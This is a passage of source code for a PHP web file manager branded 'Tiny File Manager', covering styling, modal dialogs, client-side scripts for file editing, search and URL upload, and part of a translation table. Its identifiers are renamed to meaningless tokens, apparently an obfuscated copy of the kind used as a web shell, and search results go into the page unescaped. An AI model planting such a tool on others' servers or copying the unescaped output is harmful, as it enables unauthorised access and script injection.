  992.         hr.custom-hr { border-top:1px dashed #8c8b8b;border-bottom:1px dashed #fff; }
  993.         #snackbar { visibility:hidden;min-width:250px;margin-left:-125px;background-color:#333;color:#fff;text-align:center;border-radius:2px;padding:16px;position:fixed;z-index:1;left:50%;bottom:30px;font-size:17px; }
  994.         #snackbar.show { visibility:visible;-webkit-animation:fadein 0.5s, fadeout 0.5s 2.5s;animation:fadein 0.5s, fadeout 0.5s 2.5s; }
  995.         @-webkit-keyframes fadein { from { bottom:0;opacity:0; }
  996.         to { bottom:30px;opacity:1; }
  997.         }
  998.         @keyframes fadein { from { bottom:0;opacity:0; }
  999.         to { bottom:30px;opacity:1; }
  1000.         }
  1001.         @-webkit-keyframes fadeout { from { bottom:30px;opacity:1; }
  1002.         to { bottom:0;opacity:0; }
  1003.         }
  1004.         @keyframes fadeout { from { bottom:30px;opacity:1; }
  1005.         to { bottom:0;opacity:0; }
  1006.         }
  1007.         #main-table span.badge { border-bottom:2px solid #f8f9fa }
  1008.         #main-table span.badge:nth-child(1) { border-color:#df4227 }
  1009.         #main-table span.badge:nth-child(2) { border-color:#f8b600 }
  1010.         #main-table span.badge:nth-child(3) { border-color:#00bd60 }
  1011.         #main-table span.badge:nth-child(4) { border-color:#4581ff }
  1012.         #main-table span.badge:nth-child(5) { border-color:#ac68fc }
  1013.         #main-table span.badge:nth-child(6) { border-color:#45c3d2 }
  1014.         @media only screen and (min-device-width:768px) and (max-device-width:1024px) and (orientation:landscape) and (-webkit-min-device-pixel-ratio:2) { .navbar-collapse .col-xs-6 { padding:0; }
  1015.         }
  1016.         .btn.active.focus,.btn.active:focus,.btn.focus,.btn.focus:active,.btn:active:focus,.btn:focus { outline:0!important;outline-offset:0!important;background-image:none!important;-webkit-box-shadow:none!important;box-shadow:none!important }
  1017.         .lds-facebook { display:none;position:relative;width:64px;height:64px }
  1018.         .lds-facebook div,.lds-facebook.show-me { display:inline-block }
  1019.         .lds-facebook div { position:absolute;left:6px;width:13px;background:#007bff;animation:lds-facebook 1.2s cubic-bezier(0,.5,.5,1) infinite }
  1020.         .lds-facebook div:nth-child(1) { left:6px;animation-delay:-.24s }
  1021.         .lds-facebook div:nth-child(2) { left:26px;animation-delay:-.12s }
  1022.         .lds-facebook div:nth-child(3) { left:45px;animation-delay:0s }
  1023.         @keyframes lds-facebook { 0% { top:6px;height:51px }
  1024.         100%,50% { top:19px;height:26px }
  1025.         }
  1026.         ul#search-wrapper { padding-left: 0;border: 1px solid #ecececcc; } ul#search-wrapper li { list-style: none; padding: 5px;border-bottom: 1px solid #ecececcc; }
  1027.         ul#search-wrapper li:nth-child(odd){ background: #f9f9f9cc;}
  1028.         .c-preview-img { max-width: 300px; }
  1029.         .border-radius-0 { border-radius: 0; }
  1030.         .float-right { float: right; }
  1031.         .table-hover>tbody>tr:hover>td:first-child { border-left: 1px solid #1b77fd; }
  1032.         #main-table tr.even { background-color: #F8F9Fa; }
  1033.         .filename>a>i {margin-right: 3px;}
  1034.     </style>
  1035.     <?php if(FM_THEME=="dark"):?>
  1036.         <style>
  1037.             :root {
  1038.                 --bs-bg-opacity: 1;
  1039.                 --bg-color: #f3daa6;
  1040.                 --bs-dark-rgb: 28, 36, 41 !important;
  1041.                 --bs-bg-opacity: 1;
  1042.             }
  1043.             .table-dark { --bs-table-bg: 28, 36, 41 !important; }
  1044.             .btn-primary { --bs-btn-bg: #26566c; --bs-btn-border-color: #26566c; }
  1045.             body.theme-dark { background-image: linear-gradient(90deg, #1c2429, #263238); color: #CFD8DC; }
  1046.             .list-group .list-group-item { background: #343a40; }
  1047.             .theme-dark .navbar-nav i, .navbar-nav .dropdown-toggle, .break-word { color: #CFD8DC; }
  1048.             a, a:hover, a:visited, a:active, #main-table .filename a, i.fa.fa-folder-o, i.go-back { color: var(--bg-color); }
  1049.             ul#search-wrapper li:nth-child(odd) { background: #212a2f; }
  1050.             .theme-dark .btn-outline-primary { color: #b8e59c; border-color: #b8e59c; }
  1051.             .theme-dark .btn-outline-primary:hover, .theme-dark .btn-outline-primary:active { background-color: #2d4121;}
  1052.             .theme-dark input.form-control { background-color: #101518; color: #CFD8DC; }
  1053.             .theme-dark .dropzone { background: transparent; }
  1054.             .theme-dark .inline-actions > a > i { background: #79755e; }
  1055.             .theme-dark .text-white { color: #CFD8DC !important; }
  1056.             .theme-dark .table-bordered td, .table-bordered th { border-color: #343434; }
  1057.             .theme-dark .table-bordered td .custom-control-input, .theme-dark .table-bordered th .custom-control-input { opacity: 0.678; }
  1058.             .message { background-color: #212529; }
  1059.             .compact-table tr:hover td { background-color: #3d3d3d; }
  1060.             #main-table tr.even { background-color: #21292f; }
  1061.             form.dropzone { border-color: #79755e; }
  1062.         </style>
  1063.     <?php endif;?>
  1064. </head>
  1065. <body class="<?php echo(FM_THEME=="dark")?'theme-dark':'';?> <?php echo $b347;?>">
  1066. <div id="wrapper" class="container-fluid">
  1067.     <!-- New Item creation -->
  1068.     <div class="modal fade" id="createNewItem" tabindex="-1" role="dialog" data-bs-backdrop="static" data-bs-keyboard="false" aria-labelledby="newItemModalLabel" aria-hidden="true">
  1069.         <div class="modal-dialog" role="document">
  1070.             <form class="modal-content <?php echo x44();?>" method="post">
  1071.                 <div class="modal-header">
  1072.                     <h5 class="modal-title" id="newItemModalLabel"><i class="fa fa-plus-square fa-fw"></i><?php echo z57('CreateNewItem')?></h5>
  1073.                     <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
  1074.                 </div>
  1075.                 <div class="modal-body">
  1076.                     <p><label for="newfile"><?php echo z57('ItemType')?> </label></p>
  1077.                     <div class="form-check form-check-inline">
  1078.                       <input class="form-check-input" type="radio" name="newfile" id="customRadioInline1" name="newfile" value="file">
  1079.                       <label class="form-check-label" for="customRadioInline1"><?php echo z57('File')?></label>
  1080.                     </div>
  1081.                     <div class="form-check form-check-inline">
  1082.                       <input class="form-check-input" type="radio" name="newfile" id="customRadioInline2" value="folder" checked>
  1083.                       <label class="form-check-label" for="customRadioInline2"><?php echo z57('Folder')?></label>
  1084.                     </div>
  1085.  
  1086.                     <p class="mt-3"><label for="newfilename"><?php echo z57('ItemName')?> </label></p>
  1087.                     <input type="text" name="newfilename" id="newfilename" value="" class="form-control" placeholder="<?php echo z57('Enter here...')?>" required>
  1088.                 </div>
  1089.                 <div class="modal-footer">
  1090.                     <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  1091.                     <button type="button" class="btn btn-outline-primary" data-bs-dismiss="modal"><i class="fa fa-times-circle"></i> <?php echo z57('Cancel')?></button>
  1092.                     <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo z57('CreateNow')?></button>
  1093.                 </div>
  1094.             </form>
  1095.         </div>
  1096.     </div>
  1097.  
  1098.     <!-- Advance Search Modal -->
  1099.     <div class="modal fade" id="searchModal" tabindex="-1" role="dialog" aria-labelledby="searchModalLabel" aria-hidden="true">
  1100.       <div class="modal-dialog modal-lg" role="document">
  1101.         <div class="modal-content <?php echo x44();?>">
  1102.           <div class="modal-header">
  1103.             <h5 class="modal-title col-10" id="searchModalLabel">
  1104.                 <div class="input-group mb-3">
  1105.                   <input type="text" class="form-control" placeholder="<?php echo z57('Search')?> <?php echo z57('a files')?>" aria-label="<?php echo z57('Search')?>" aria-describedby="search-addon3" id="advanced-search" autofocus required>
  1106.                   <span class="input-group-text" id="search-addon3"><i class="fa fa-search"></i></span>
  1107.                 </div>
  1108.             </h5>
  1109.             <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
  1110.           </div>
  1111.           <div class="modal-body">
  1112.             <form action="" method="post">
  1113.                 <div class="lds-facebook"><div></div><div></div><div></div></div>
  1114.                 <ul id="search-wrapper">
  1115.                     <p class="m-2"><?php echo z57('Search file in folder and subfolders...')?></p>
  1116.                 </ul>
  1117.             </form>
  1118.           </div>
  1119.         </div>
  1120.       </div>
  1121.     </div>
  1122.  
  1123.     <!--Rename Modal -->
  1124.     <div class="modal modal-alert" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" role="dialog" id="renameDailog">
  1125.       <div class="modal-dialog" role="document">
  1126.         <form class="modal-content rounded-3 shadow <?php echo x44();?>" method="post" autocomplete="off">
  1127.           <div class="modal-body p-4 text-center">
  1128.             <h5 class="mb-3"><?php echo z57('Are you sure want to rename?')?></h5>
  1129.             <p class="mb-1">
  1130.                 <input type="text" name="rename_to" id="js-rename-to" class="form-control" placeholder="<?php echo z57('Enter new file name')?>" required>
  1131.                 <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  1132.                 <input type="hidden" name="rename_from" id="js-rename-from">
  1133.             </p>
  1134.           </div>
  1135.           <div class="modal-footer flex-nowrap p-0">
  1136.             <button type="button" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0 border-end" data-bs-dismiss="modal"><?php echo z57('Cancel')?></button>
  1137.             <button type="submit" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0"><strong><?php echo z57('Okay')?></strong></button>
  1138.           </div>
  1139.         </form>
  1140.       </div>
  1141.     </div>
  1142.  
  1143.     <!-- Confirm Modal -->
  1144.     <script type="text/html" id="js-tpl-confirm">
  1145.         <div class="modal modal-alert confirmDailog" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" role="dialog" id="confirmDailog-<%this.id%>">
  1146.           <div class="modal-dialog" role="document">
  1147.             <form class="modal-content rounded-3 shadow <?php echo x44();?>" method="post" autocomplete="off" action="<%this.action%>">
  1148.               <div class="modal-body p-4 text-center">
  1149.                 <h5 class="mb-2"><?php echo z57('Are you sure want to')?> <%this.title%> ?</h5>
  1150.                 <p class="mb-1"><%this.content%></p>
  1151.               </div>
  1152.               <div class="modal-footer flex-nowrap p-0">
  1153.                 <button type="button" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0 border-end" data-bs-dismiss="modal"><?php echo z57('Cancel')?></button>
  1154.                 <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  1155.                 <button type="submit" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0" data-bs-dismiss="modal"><strong><?php echo z57('Okay')?></strong></button>
  1156.               </div>
  1157.             </form>
  1158.           </div>
  1159.         </div>
  1160.     </script>
  1161.  
  1162.     <?php }/**
  1163.      * Show page footer after login
  1164.      */ function t56(){?>
  1165. </div>
  1166. <?php m7('js-jquery');?>
  1167. <?php m7('js-bootstrap');?>
  1168. <?php m7('js-jquery-datatables');?>
  1169. <?php if(FM_USE_HIGHLIGHTJS&&isset($_GET['view'])):?>
  1170.     <?php m7('js-highlightjs');?>
  1171.     <script>hljs.highlightAll(); var isHighlightingEnabled = true;</script>
  1172. <?php endif;?>
  1173. <script>
  1174.     function template(html,options){
  1175.         var re=/<\%([^\%>]+)?\%>/g,reExp=/(^( )?(if|for|else|switch|case|break|{|}))(.*)?/g,code='var r=[];\n',cursor=0,match;var add=function(line,js){js?(code+=line.match(reExp)?line+'\n':'r.push('+line+');\n'):(code+=line!=''?'r.push("'+line.replace(/"/g,'\\"')+'");\n':'');return add}
  1176.         while(match=re.exec(html)){add(html.slice(cursor,match.index))(match[1],!0);cursor=match.index+match[0].length}
  1177.         add(html.substr(cursor,html.length-cursor));code+='return r.join("");';return new Function(code.replace(/[\r\t\n]/g,'')).apply(options)
  1178.     }
  1179.     function rename(e, t) { if(t) { $("#js-rename-from").val(t);$("#js-rename-to").val(t); $("#renameDailog").modal('show'); } }
  1180.     function change_checkboxes(e, t) { for (var n = e.length - 1; n >= 0; n--) e[n].checked = "boolean" == typeof t ? t : !e[n].checked }
  1181.     function get_checkboxes() { for (var e = document.getElementsByName("file[]"), t = [], n = e.length - 1; n >= 0; n--) (e[n].type = "checkbox") && t.push(e[n]); return t }
  1182.     function select_all() { change_checkboxes(get_checkboxes(), !0) }
  1183.     function unselect_all() { change_checkboxes(get_checkboxes(), !1) }
  1184.     function invert_all() { change_checkboxes(get_checkboxes()) }
  1185.     function checkbox_toggle() { var e = get_checkboxes(); e.push(this), change_checkboxes(e) }
  1186.     function backup(e, t) { // Create file backup with .bck
  1187.         var n = new XMLHttpRequest,
  1188.             a = "path=" + e + "&file=" + t + "&token="+ window.csrf +"&type=backup&ajax=true";
  1189.         return n.open("POST", "", !0), n.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), n.onreadystatechange = function () {
  1190.             4 == n.readyState && 200 == n.status && toast(n.responseText)
  1191.         }, n.send(a), !1
  1192.     }
  1193.     // Toast message
  1194.     function toast(txt) { var x = document.getElementById("snackbar");x.innerHTML=txt;x.className = "show";setTimeout(function(){ x.className = x.className.replace("show", ""); }, 3000); }
  1195.     // Save file
  1196.     function edit_save(e, t) {
  1197.         var n = "ace" == t ? editor.getSession().getValue() : document.getElementById("normal-editor").value;
  1198.         if (typeof n !== 'undefined' && n !== null) {
  1199.             if (true) {
  1200.                 var data = {ajax: true, content: n, type: 'save', token: window.csrf};
  1201.  
  1202.                 $.ajax({
  1203.                     type: "POST",
  1204.                     url: window.location,
  1205.                     data: JSON.stringify(data),
  1206.                     contentType: "application/json; charset=utf-8",
  1207.                     success: function(mes){toast("Saved Successfully"); window.onbeforeunload = function() {return}},
  1208.                     failure: function(mes) {toast("Error: try again");},
  1209.                     error: function(mes) {toast(`<p style="background-color:red">${mes.responseText}</p>`);}
  1210.                 });
  1211.             } else {
  1212.                 var a = document.createElement("form");
  1213.                 a.setAttribute("method", "POST"), a.setAttribute("action", "");
  1214.                 var o = document.createElement("textarea");
  1215.                 o.setAttribute("type", "textarea"), o.setAttribute("name", "savedata");
  1216.                 let cx = document.createElement("input"); cx.setAttribute("type", "hidden");cx.setAttribute("name", "token");cx.setAttribute("value", window.csrf);
  1217.                 var c = document.createTextNode(n);
  1218.                 o.appendChild(c), a.appendChild(o), a.appendChild(cx), document.body.appendChild(a), a.submit()
  1219.             }
  1220.         }
  1221.     }
  1222.     function show_new_pwd() { $(".js-new-pwd").toggleClass('hidden'); }
  1223.     // Save Settings
  1224.     function save_settings($this) {
  1225.         let form = $($this);
  1226.         $.ajax({
  1227.             type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
  1228.             success: function (data) {if(data) { window.location.reload();}}
  1229.         }); return false;
  1230.     }
  1231.     //Create new password hash
  1232.     function new_password_hash($this) {
  1233.         let form = $($this), $pwd = $("#js-pwd-result"); $pwd.val('');
  1234.         $.ajax({
  1235.             type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
  1236.             success: function (data) { if(data) { $pwd.val(data); } }
  1237.         }); return false;
  1238.     }
  1239.     // Upload files using URL @param {Object}
  1240.     function upload_from_url($this) {
  1241.         let form = $($this), resultWrapper = $("div#js-url-upload__list");
  1242.         $.ajax({
  1243.             type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
  1244.             beforeSend: function() { form.find("input[name=uploadurl]").attr("disabled","disabled"); form.find("button").hide(); form.find(".lds-facebook").addClass('show-me'); },
  1245.             success: function (data) {
  1246.                 if(data) {
  1247.                     data = JSON.parse(data);
  1248.                     if(data.done) {
  1249.                         resultWrapper.append('<div class="alert alert-success row">Uploaded Successful: '+data.done.name+'</div>'); form.find("input[name=uploadurl]").val('');
  1250.                     } else if(data['fail']) { resultWrapper.append('<div class="alert alert-danger row">Error: '+data.fail.message+'</div>'); }
  1251.                     form.find("input[name=uploadurl]").removeAttr("disabled");form.find("button").show();form.find(".lds-facebook").removeClass('show-me');
  1252.                 }
  1253.             },
  1254.             error: function(xhr) {
  1255.                 form.find("input[name=uploadurl]").removeAttr("disabled");form.find("button").show();form.find(".lds-facebook").removeClass('show-me');console.error(xhr);
  1256.             }
  1257.         }); return false;
  1258.     }
  1259.     // Search template
  1260.     function search_template(data) {
  1261.         var response = "";
  1262.         $.each(data, function (key, val) {
  1263.             response += `<li><a href="?p=${val.path}&view=${val.name}">${val.path}/${val.name}</a></li>`;
  1264.         });
  1265.         return response;
  1266.     }
  1267.     // Advance search
  1268.     function fm_search() {
  1269.         var searchTxt = $("input#advanced-search").val(), searchWrapper = $("ul#search-wrapper"), path = $("#js-search-modal").attr("href"), _html = "", $loader = $("div.lds-facebook");
  1270.         if(!!searchTxt && searchTxt.length > 2 && path) {
  1271.             var data = {ajax: true, content: searchTxt, path:path, type: 'search', token: window.csrf };
  1272.             $.ajax({
  1273.                 type: "POST",
  1274.                 url: window.location,
  1275.                 data: data,
  1276.                 beforeSend: function() {
  1277.                     searchWrapper.html('');
  1278.                     $loader.addClass('show-me');
  1279.                 },
  1280.                 success: function(data){
  1281.                     $loader.removeClass('show-me');
  1282.                     data = JSON.parse(data);
  1283.                     if(data && data.length) {
  1284.                         _html = search_template(data);
  1285.                         searchWrapper.html(_html);
  1286.                     } else { searchWrapper.html('<p class="m-2">No result found!<p>'); }
  1287.                 },
  1288.                 error: function(xhr) { $loader.removeClass('show-me'); searchWrapper.html('<p class="m-2">ERROR: Try again later!</p>'); },
  1289.                 failure: function(mes) { $loader.removeClass('show-me'); searchWrapper.html('<p class="m-2">ERROR: Try again later!</p>');}
  1290.             });
  1291.         } else { searchWrapper.html("OOPS: minimum 3 characters required!"); }
  1292.     }
  1293.  
  1294.     // action confirm dailog modal
  1295.     function confirmDailog(e, id = 0, title = "Action", content = "", action = null) {
  1296.         e.preventDefault();
  1297.         const tplObj = {id, title, content: decodeURIComponent(content.replace(/\+/g, ' ')), action};
  1298.         let tpl = $("#js-tpl-confirm").html();
  1299.         $(".modal.confirmDailog").remove();
  1300.         $('#wrapper').append(template(tpl,tplObj));
  1301.         const $confirmDailog = $("#confirmDailog-"+tplObj.id);
  1302.         $confirmDailog.modal('show');
  1303.         return false;
  1304.     }
  1305.    
  1306.  
  1307.     // on mouse hover image preview
  1308.     !function(s){s.previewImage=function(e){var o=s(document),t=".previewImage",a=s.extend({xOffset:20,yOffset:-20,fadeIn:"fast",css:{padding:"5px",border:"1px solid #cccccc","background-color":"#fff"},eventSelector:"[data-preview-image]",dataKey:"previewImage",overlayId:"preview-image-plugin-overlay"},e);return o.off(t),o.on("mouseover"+t,a.eventSelector,function(e){s("p#"+a.overlayId).remove();var o=s("<p>").attr("id",a.overlayId).css("position","absolute").css("display","none").append(s('<img class="c-preview-img">').attr("src",s(this).data(a.dataKey)));a.css&&o.css(a.css),s("body").append(o),o.css("top",e.pageY+a.yOffset+"px").css("left",e.pageX+a.xOffset+"px").fadeIn(a.fadeIn)}),o.on("mouseout"+t,a.eventSelector,function(){s("#"+a.overlayId).remove()}),o.on("mousemove"+t,a.eventSelector,function(e){s("#"+a.overlayId).css("top",e.pageY+a.yOffset+"px").css("left",e.pageX+a.xOffset+"px")}),this},s.previewImage()}(jQuery);
  1309.  
  1310.     // Dom Ready Events
  1311.     $(document).ready( function () {
  1312.         // dataTable init
  1313.         var $table = $('#main-table'),
  1314.             tableLng = $table.find('th').length,
  1315.             _targets = (tableLng && tableLng == 7 ) ? [0, 4,5,6] : tableLng == 5 ? [0,4] : [3];
  1316.             mainTable = $('#main-table').DataTable({paging: false, info: false, order: [], columnDefs: [{targets: _targets, orderable: false}]
  1317.         });
  1318.         // filter table
  1319.         $('#search-addon').on( 'keyup', function () {
  1320.             mainTable.search( this.value ).draw();
  1321.         });
  1322.         $("input#advanced-search").on('keyup', function (e) {
  1323.             if (e.keyCode === 13) { fm_search(); }
  1324.         });
  1325.         $('#search-addon3').on( 'click', function () { fm_search(); });
  1326.         //upload nav tabs
  1327.         $(".fm-upload-wrapper .card-header-tabs").on("click", 'a', function(e){
  1328.             e.preventDefault();let target=$(this).data('target');
  1329.             $(".fm-upload-wrapper .card-header-tabs a").removeClass('active');$(this).addClass('active');
  1330.             $(".fm-upload-wrapper .card-tabs-container").addClass('hidden');$(target).removeClass('hidden');
  1331.         });
  1332.     });
  1333. </script>
  1334. <?php if(isset($_GET['edit'])&&isset($_GET['env'])&&FM_EDIT_FILE&&!FM_READONLY):$w144=pathinfo($_GET["edit"],PATHINFO_EXTENSION);$w144=$w144=="js"?"javascript":$w144;?>
  1335.     <?php m7('js-ace');?>
  1336.     <script>
  1337.         var editor = ace.edit("editor");
  1338.         editor.getSession().setMode( {path:"ace/mode/<?php echo $w144;?>", inline:true} );
  1339.         //editor.setTheme("ace/theme/twilight"); //Dark Theme
  1340.         editor.setShowPrintMargin(false); // Hide the vertical ruler
  1341.         function ace_commend (cmd) { editor.commands.exec(cmd, editor); }
  1342.         editor.commands.addCommands([{
  1343.             name: 'save', bindKey: {win: 'Ctrl-S',  mac: 'Command-S'},
  1344.             exec: function(editor) { edit_save(this, 'ace'); }
  1345.         }]);
  1346.         function renderThemeMode() {
  1347.             var $modeEl = $("select#js-ace-mode"), $themeEl = $("select#js-ace-theme"), $fontSizeEl = $("select#js-ace-fontSize"), optionNode = function(type, arr){ var $Option = ""; $.each(arr, function(i, val) { $Option += "<option value='"+type+i+"'>" + val + "</option>"; }); return $Option; },
  1348.                 _data = {"aceTheme":{"bright":{"chrome":"Chrome","clouds":"Clouds","crimson_editor":"Crimson Editor","dawn":"Dawn","dreamweaver":"Dreamweaver","eclipse":"Eclipse","github":"GitHub","iplastic":"IPlastic","solarized_light":"Solarized Light","textmate":"TextMate","tomorrow":"Tomorrow","xcode":"XCode","kuroir":"Kuroir","katzenmilch":"KatzenMilch","sqlserver":"SQL Server"},"dark":{"ambiance":"Ambiance","chaos":"Chaos","clouds_midnight":"Clouds Midnight","dracula":"Dracula","cobalt":"Cobalt","gruvbox":"Gruvbox","gob":"Green on Black","idle_fingers":"idle Fingers","kr_theme":"krTheme","merbivore":"Merbivore","merbivore_soft":"Merbivore Soft","mono_industrial":"Mono Industrial","monokai":"Monokai","pastel_on_dark":"Pastel on dark","solarized_dark":"Solarized Dark","terminal":"Terminal","tomorrow_night":"Tomorrow Night","tomorrow_night_blue":"Tomorrow Night Blue","tomorrow_night_bright":"Tomorrow Night Bright","tomorrow_night_eighties":"Tomorrow Night 80s","twilight":"Twilight","vibrant_ink":"Vibrant Ink"}},"aceMode":{"javascript":"JavaScript","abap":"ABAP","abc":"ABC","actionscript":"ActionScript","ada":"ADA","apache_conf":"Apache Conf","asciidoc":"AsciiDoc","asl":"ASL","assembly_x86":"Assembly x86","autohotkey":"AutoHotKey","apex":"Apex","batchfile":"BatchFile","bro":"Bro","c_cpp":"C and C++","c9search":"C9Search","cirru":"Cirru","clojure":"Clojure","cobol":"Cobol","coffee":"CoffeeScript","coldfusion":"ColdFusion","csharp":"C#","csound_document":"Csound Document","csound_orchestra":"Csound","csound_score":"Csound Score","css":"CSS","curly":"Curly","d":"D","dart":"Dart","diff":"Diff","dockerfile":"Dockerfile","dot":"Dot","drools":"Drools","edifact":"Edifact","eiffel":"Eiffel","ejs":"EJS","elixir":"Elixir","elm":"Elm","erlang":"Erlang","forth":"Forth","fortran":"Fortran","fsharp":"FSharp","fsl":"FSL","ftl":"FreeMarker","gcode":"Gcode","gherkin":"Gherkin","gitignore":"Gitignore","glsl":"Glsl","gobstones":"Gobstones","golang":"Go","graphqlschema":"GraphQLSchema","groovy":"Groovy","haml":"HAML","handlebars":"Handlebars","haskell":"Haskell","haskell_cabal":"Haskell Cabal","haxe":"haXe","hjson":"Hjson","html":"HTML","html_elixir":"HTML (Elixir)","html_ruby":"HTML (Ruby)","ini":"INI","io":"Io","jack":"Jack","jade":"Jade","java":"Java","json":"JSON","jsoniq":"JSONiq","jsp":"JSP","jssm":"JSSM","jsx":"JSX","julia":"Julia","kotlin":"Kotlin","latex":"LaTeX","less":"LESS","liquid":"Liquid","lisp":"Lisp","livescript":"LiveScript","logiql":"LogiQL","lsl":"LSL","lua":"Lua","luapage":"LuaPage","lucene":"Lucene","makefile":"Makefile","markdown":"Markdown","mask":"Mask","matlab":"MATLAB","maze":"Maze","mel":"MEL","mixal":"MIXAL","mushcode":"MUSHCode","mysql":"MySQL","nix":"Nix","nsis":"NSIS","objectivec":"Objective-C","ocaml":"OCaml","pascal":"Pascal","perl":"Perl","perl6":"Perl 6","pgsql":"pgSQL","php_laravel_blade":"PHP (Blade Template)","php":"PHP","puppet":"Puppet","pig":"Pig","powershell":"Powershell","praat":"Praat","prolog":"Prolog","properties":"Properties","protobuf":"Protobuf","python":"Python","r":"R","razor":"Razor","rdoc":"RDoc","red":"Red","rhtml":"RHTML","rst":"RST","ruby":"Ruby","rust":"Rust","sass":"SASS","scad":"SCAD","scala":"Scala","scheme":"Scheme","scss":"SCSS","sh":"SH","sjs":"SJS","slim":"Slim","smarty":"Smarty","snippets":"snippets","soy_template":"Soy Template","space":"Space","sql":"SQL","sqlserver":"SQLServer","stylus":"Stylus","svg":"SVG","swift":"Swift","tcl":"Tcl","terraform":"Terraform","tex":"Tex","text":"Text","textile":"Textile","toml":"Toml","tsx":"TSX","twig":"Twig","typescript":"Typescript","vala":"Vala","vbscript":"VBScript","velocity":"Velocity","verilog":"Verilog","vhdl":"VHDL","visualforce":"Visualforce","wollok":"Wollok","xml":"XML","xquery":"XQuery","yaml":"YAML","django":"Django"},"fontSize":{8:8,10:10,11:11,12:12,13:13,14:14,15:15,16:16,17:17,18:18,20:20,22:22,24:24,26:26,30:30}};
  1349.             if(_data && _data.aceMode) { $modeEl.html(optionNode("ace/mode/", _data.aceMode)); }
  1350.             if(_data && _data.aceTheme) { var lightTheme = optionNode("ace/theme/", _data.aceTheme.bright), darkTheme = optionNode("ace/theme/", _data.aceTheme.dark); $themeEl.html("<optgroup label=\"Bright\">"+lightTheme+"</optgroup><optgroup label=\"Dark\">"+darkTheme+"</optgroup>");}
  1351.             if(_data && _data.fontSize) { $fontSizeEl.html(optionNode("", _data.fontSize)); }
  1352.             $modeEl.val( editor.getSession().$modeId );
  1353.             $themeEl.val( editor.getTheme() );
  1354.             $fontSizeEl.val(12).change(); //set default font size in drop down
  1355.         }
  1356.  
  1357.         $(function(){
  1358.             renderThemeMode();
  1359.             $(".js-ace-toolbar").on("click", 'button', function(e){
  1360.                 e.preventDefault();
  1361.                 let cmdValue = $(this).attr("data-cmd"), editorOption = $(this).attr("data-option");
  1362.                 if(cmdValue && cmdValue != "none") {
  1363.                     ace_commend(cmdValue);
  1364.                 } else if(editorOption) {
  1365.                     if(editorOption == "fullscreen") {
  1366.                         (void 0!==document.fullScreenElement&&null===document.fullScreenElement||void 0!==document.msFullscreenElement&&null===document.msFullscreenElement||void 0!==document.mozFullScreen&&!document.mozFullScreen||void 0!==document.webkitIsFullScreen&&!document.webkitIsFullScreen)
  1367.                         &&(editor.container.requestFullScreen?editor.container.requestFullScreen():editor.container.mozRequestFullScreen?editor.container.mozRequestFullScreen():editor.container.webkitRequestFullScreen?editor.container.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT):editor.container.msRequestFullscreen&&editor.container.msRequestFullscreen());
  1368.                     } else if(editorOption == "wrap") {
  1369.                         let wrapStatus = (editor.getSession().getUseWrapMode()) ? false : true;
  1370.                         editor.getSession().setUseWrapMode(wrapStatus);
  1371.                     }
  1372.                 }
  1373.             });
  1374.             $("select#js-ace-mode, select#js-ace-theme, select#js-ace-fontSize").on("change", function(e){
  1375.                 e.preventDefault();
  1376.                 let selectedValue = $(this).val(), selectionType = $(this).attr("data-type");
  1377.                 if(selectedValue && selectionType == "mode") {
  1378.                     editor.getSession().setMode(selectedValue);
  1379.                 } else if(selectedValue && selectionType == "theme") {
  1380.                     editor.setTheme(selectedValue);
  1381.                 }else if(selectedValue && selectionType == "fontSize") {
  1382.                     editor.setFontSize(parseInt(selectedValue));
  1383.                 }
  1384.             });
  1385.         });
  1386.     </script>
  1387. <?php endif;?>
  1388. <div id="snackbar"></div>
  1389. </body>
  1390. </html>
  1391. <?php }/**
  1392.  * Language Translation System
  1393.  * @param string $txt
  1394.  * @return string
  1395.  */ function z57($v357){global $x89;$k276['en']['AppName']='Tiny File Manager';$k276['en']['AppTitle']='File Manager';$k276['en']['Login']='Sign in';$k276['en']['Username']='Username';$k276['en']['Password']='Password';$k276['en']['Logout']='Sign Out';$k276['en']['Move']='Move';$k276['en']['Copy']='Copy';$k276['en']['Save']='Save';$k276['en']['SelectAll']='Select all';$k276['en']['UnSelectAll']='Unselect all';$k276['en']['File']='File';$k276['en']['Back']='Back';$k276['en']['Size']='Size';$k276['en']['Perms']='Perms';$k276['en']['Modified']='Modified';$k276['en']['Owner']='Owner';$k276['en']['Search']='Search';$k276['en']['NewItem']='New Item';$k276['en']['Folder']='Folder';$k276['en']['Delete']='Delete';$k276['en']['Rename']='Rename';$k276['en']['CopyTo']='Copy to';$k276['en']['DirectLink']='Direct link';$k276['en']['UploadingFiles']='Upload Files';$k276['en']['ChangePermissions']='Change Permissions';$k276['en']['Copying']='Copying';$k276['en']['CreateNewItem']='Create New Item';$k276['en']['Name']='Name';$k276['en']['AdvancedEditor']='Advanced Editor';$k276['en']['Actions']='Actions';$k276['en']['Folder is empty']='Folder is empty';$k276['en']['Upload']='Upload';$k276['en']['Cancel']='Cancel';$k276['en']['InvertSelection']='Invert Selection';$k276['en']['DestinationFolder']='Destination Folder';$k276['en']['ItemType']='Item Type';$k276['en']['ItemName']='Item Name';$k276['en']['CreateNow']='Create Now';$k276['en']['Download']='Download';$k276['en']['Open']='Open';$k276['en']['UnZip']='UnZip';$k276['en']['UnZipToFolder']='UnZip to folder';$k276['en']['Edit']='Edit';$k276['en']['NormalEditor']='Normal Editor';$k276['en']['BackUp']='Back Up';$k276['en']['SourceFolder']='Source 